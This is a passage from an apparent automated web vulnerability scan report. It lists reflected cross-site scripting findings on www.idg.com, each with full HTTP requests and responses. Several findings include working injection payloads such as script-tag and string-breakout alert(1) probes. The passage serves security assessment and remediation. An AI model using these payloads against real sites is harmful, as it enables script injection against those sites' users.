Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.idg.com/www/homenew.nsf/home?readform

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Mon, 19 Sep 2011 19:31:29 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5112
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/core.jsf89a2";0571f993f6e?OpenJavascriptLibrary");
} catch(err) {}</script>
...[SNIP]...

1.24. http://www.idg.com/www/homenew.nsf/home [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.idg.com
Path:   /www/homenew.nsf/home

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7adb0"%3b9c68301314f was submitted in the REST URL parameter 1. This input was echoed as 7adb0";9c68301314f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www7adb0"%3b9c68301314f/homenew.nsf/home?readform HTTP/1.1
Host: www.idg.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.idg.com/

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Mon, 19 Sep 2011 19:31:26 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5096
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www7adb0";9c68301314f/homenew.nsf/home?readform");
} catch(err) {}</script>
...[SNIP]...

1.25. http://www.idg.com/www/homenew.nsf/home [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.idg.com
Path:   /www/homenew.nsf/home

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a689b"%3b75c07fbe104 was submitted in the REST URL parameter 3. This input was echoed as a689b";75c07fbe104 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/homea689b"%3b75c07fbe104?readform HTTP/1.1
Host: www.idg.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.idg.com/

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Mon, 19 Sep 2011 19:31:30 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5096
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/homea689b";75c07fbe104?readform");
} catch(err) {}</script>
...[SNIP]...

1.26. http://www.idg.com/www/homenew.nsf/home [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.idg.com
Path:   /www/homenew.nsf/home

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9341"><script>alert(1)</script>3b16a29b341 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /www/homenew.nsf/home?readform&b9341"><script>alert(1)</script>3b16a29b341=1 HTTP/1.1
Host: www.idg.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.idg.com/

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Mon, 19 Sep 2011 19:31:25 GMT
Last-Modified: Mon, 19 Sep 2011 19:31:23 GMT
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html
Content-Length: 15659
Cache-control: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>IDG.com: Home</titl
...[SNIP]...
<input name="QUERY_STRING" id="QUERY_STRING" type="hidden" value="readform&b9341"><script>alert(1)</script>3b16a29b341=1">
...[SNIP]...

1.27. http://www.idg.com/www/homenew.nsf/home [readform parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.idg.com
Path:   /www/homenew.nsf/home

Issue detail

The value of the readform request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f5127"-alert(1)-"e35f2f22a26 was submitted in the readform parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/home?readformf5127"-alert(1)-"e35f2f22a26 HTTP/1.1
Host: www.idg.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.idg.com/

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Mon, 19 Sep 2011 19:31:20 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5106
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/home?readformf5127"-alert(1)-"e35f2f22a26");
} catch(err) {}</script>
...[SNIP]...

1.28. http://www.idg.com/www/homenew.nsf/idg_mainbanner.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.idg.com
Path:   /www/homenew.nsf/idg_mainbanner.jpg

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 875b7"%3be21c28a9c5f was submitted in the REST URL parameter 1. This input was echoed as 875b7";e21c28a9c5f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www875b7"%3be21c28a9c5f/homenew.nsf/idg_mainbanner.jpg?openimageresource HTTP/1.1
Host: www.idg.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.idg.com/www/homenew.nsf/home?readform

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Mon, 19 Sep 2011 19:33:48 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5119
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www875b7";e21c28a9c5f/homenew.nsf/idg_mainbanner.jpg?openimageresource");
} catch(err) {}</script>
...[SNIP]...

1.29. http://www.idg.com/www/homenew.nsf/idg_mainbanner.jpg [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.idg.com
Path:   /www/homenew.nsf/idg_mainbanner.jpg

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9a4c4"%3b394d63a7787 was submitted in the REST URL parameter 3. This input was echoed as 9a4c4";394d63a7787 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/idg_mainbanner.jpg9a4c4"%3b394d63a7787?openimageresource HTTP/1.1
Host: www.idg.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.idg.com/www/homenew.nsf/home?readform

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Mon, 19 Sep 2011 19:33:49 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5119
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/idg_mainbanner.jpg9a4c4";394d63a7787?openimageresource");
} catch(err) {}</script>
...[SNIP]...

1.30. http://www.idg.com/www/homenew.nsf/idg_mainbanner.jpg [openimageresource parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.idg.com
Path:   /www/homenew.nsf/idg_mainbanner.jpg

Issue detail

The value of the openimageresource request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ea397"-alert(1)-"7607a1e5cad was submitted in the openimageresource parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/idg_mainbanner.jpg?openimageresourceea397"-alert(1)-"7607a1e5cad HTTP/1.1
Host: www.idg.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.idg.com/www/homenew.nsf/home?readform

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Mon, 19 Sep 2011 19:33:48 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5129
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/idg_mainbanner.jpg?openimageresourceea397"-alert(1)-"7607a1e5cad");
} catch(err) {}</script>
...[SNIP]...

1.31. http://www.idg.com/www/homenew.nsf/menu.js [OpenJavascriptLibrary parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.idg.com
Path:   /www/homenew.nsf/menu.js

Issue detail

The value of the OpenJavascriptLibrary request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cc234"-alert(1)-"e110c3875ed was submitted in the OpenJavascriptLibrary parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/menu.js?OpenJavascriptLibrarycc234"-alert(1)-"e110c3875ed HTTP/1.1
Host: www.idg.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.idg.com/www/homenew.nsf/home?readform

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Mon, 19 Sep 2011 19:31:30 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5122
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/menu.js?OpenJavascriptLibrarycc234"-alert(1)-"e110c3875ed");
} catch(err) {}</script>
...[SNIP]...

1.32. http://www.idg.com/www/homenew.nsf/menu.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.idg.com
Path:   /www/homenew.nsf/menu.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6562"%3b2997de139b8 was submitted in the REST URL parameter 1. This input was echoed as c6562";2997de139b8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wwwc6562"%3b2997de139b8/homenew.nsf/menu.js?OpenJavascriptLibrary HTTP/1.1
Host: www.idg.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.idg.com/www/homenew.nsf/home?readform

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Mon, 19 Sep 2011 19:31:31 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5112
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /wwwc6562";2997de139b8/homenew.nsf/menu.js?OpenJavascriptLibrary");
} catch(err) {}</script>
...[SNIP]...

1.33. http://www.idg.com/www/homenew.nsf/menu.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.idg.com
Path:   /www/homenew.nsf/menu.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b42be"%3bf38c0615799 was submitted in the REST URL parameter 3. This input was echoed as b42be";f38c0615799 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/menu.jsb42be"%3bf38c0615799?OpenJavascriptLibrary HTTP/1.1
Host: www.idg.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.idg.com/www/homenew.nsf/home?readform

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Mon, 19 Sep 2011 19:31:36 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5112
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/menu.jsb42be";f38c0615799?OpenJavascriptLibrary");
} catch(err) {}</script>
...[SNIP]...

1.34. http://www.idg.com/www/homenew.nsf/public_smo_scripts.js [OpenJavascriptLibrary parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.idg.com
Path:   /www/homenew.nsf/public_smo_scripts.js

Issue detail

The value of the OpenJavascriptLibrary request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e7dc"-alert(1)-"18e9a0a90b0 was submitted in the OpenJavascriptLibrary parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/public_smo_scripts.js?OpenJavascriptLibrary6e7dc"-alert(1)-"18e9a0a90b0 HTTP/1.1
Host: www.idg.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.idg.com/www/homenew.nsf/home?readform

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Mon, 19 Sep 2011 19:31:16 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5136
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
cript type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/public_smo_scripts.js?OpenJavascriptLibrary6e7dc"-alert(1)-"18e9a0a90b0");
} catch(err) {}</script>
...[SNIP]...

1.35. http://www.idg.com/www/homenew.nsf/public_smo_scripts.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.idg.com
Path:   /www/homenew.nsf/public_smo_scripts.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7db26"%3bbf0a7a200d0 was submitted in the REST URL parameter 1. This input was echoed as 7db26";bf0a7a200d0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www7db26"%3bbf0a7a200d0/homenew.nsf/public_smo_scripts.js?OpenJavascriptLibrary HTTP/1.1
Host: www.idg.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.idg.com/www/homenew.nsf/home?readform

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Mon, 19 Sep 2011 19:31:17 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5126
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www7db26";bf0a7a200d0/homenew.nsf/public_smo_scripts.js?OpenJavascriptLibrary");
} catch(err) {}</script>
...[SNIP]...

1.36. http://www.idg.com/www/homenew.nsf/public_smo_scripts.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.idg.com
Path:   /www/homenew.nsf/public_smo_scripts.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 428b8"%3bdf90df4ca7 was submitted in the REST URL parameter 3. This input was echoed as 428b8";df90df4ca7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/public_smo_scripts.js428b8"%3bdf90df4ca7?OpenJavascriptLibrary HTTP/1.1
Host: www.idg.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.idg.com/www/homenew.nsf/home?readform

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Mon, 19 Sep 2011 19:31:27 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5125
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/public_smo_scripts.js428b8";df90df4ca7?OpenJavascriptLibrary");
} catch(err) {}</script>
...[SNIP]...

1.37. http://www.idg.com/www/homenew.nsf/request.js [OpenJavascriptLibrary parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.idg.com
Path:   /www/homenew.nsf/request.js

Issue detail

The value of the OpenJavascriptLibrary request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64814"-alert(1)-"21d524a7a93 was submitted in the OpenJavascriptLibrary parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/request.js?OpenJavascriptLibrary64814"-alert(1)-"21d524a7a93 HTTP/1.1
Host: www.idg.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.idg.com/www/homenew.nsf/home?readform

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Mon, 19 Sep 2011 19:31:25 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5125
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/request.js?OpenJavascriptLibrary64814"-alert(1)-"21d524a7a93");
} catch(err) {}</script>
...[SNIP]...

1.38. http://www.idg.com/www/homenew.nsf/request.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.idg.com
Path:   /www/homenew.nsf/request.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f718a"%3bbe6d9bd42d1 was submitted in the REST URL parameter 1. This input was echoed as f718a";be6d9bd42d1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wwwf718a"%3bbe6d9bd42d1/homenew.nsf/request.js?OpenJavascriptLibrary HTTP/1.1
Host: www.idg.com
